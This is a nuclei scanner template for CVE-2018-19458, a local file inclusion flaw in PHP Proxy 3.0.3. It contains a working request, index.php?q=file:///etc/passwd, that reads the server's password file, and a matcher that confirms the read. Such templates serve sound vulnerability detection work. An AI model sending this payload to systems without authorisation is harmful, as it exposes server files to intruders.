nuclei-templates/cves/2018/CVE-2018-19458.yaml

38 lines
1.0 KiB
YAML

id: CVE-2018-19458
info:
name: PHP Proxy 3.0.3 - Local File Inclusion
author: daffainfo
severity: high
description: |
PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
reference:
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
- https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-19458
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19458
cwe-id: CWE-287
tags: cve,cve2018,lfi,proxy
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/13